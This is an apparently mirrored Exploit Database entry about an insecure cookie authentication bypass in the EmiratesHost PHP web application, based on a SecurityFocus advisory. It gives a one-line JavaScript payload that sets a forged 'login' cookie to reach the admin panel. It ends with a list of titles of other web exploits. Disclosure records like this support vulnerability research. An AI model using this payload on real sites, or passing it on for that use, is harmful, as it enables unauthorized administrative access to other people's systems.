EmiratesHost – Insecure Cookie Authentication Bypass

Exploit Database
118 阅读

作者： jago-dz

日期： 2010-02-01
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/33946/

source: https://www.securityfocus.com/bid/39963/info

EmiratesHost is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.

Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.

The following example data is available:

www.example.com/admin

javascript:document.cookie="login=right;path=/";

last Exploits
EmiratesHost – Insecure Cookie Authentication Bypass的更多信息

Joomla! Component GMapFP 3.30 – Arbitrary File Upload：
Cmaps v8.0 – SQL injection：
Balitbang CMS 3.3 – ‘index.php?hal’ SQL Injection：
qdPM 9.2 – Cross-site Request Forgery (CSRF)：
Sky File 2.1.0 iOS – Directory Traversal：
Car Portal 2.0 – ‘car_make’ Cross-Site Scripting：
Booking Calendar – Multiple Vulnerabilities：
Getsimple CMS 3.3.10 – Arbitrary File Upload：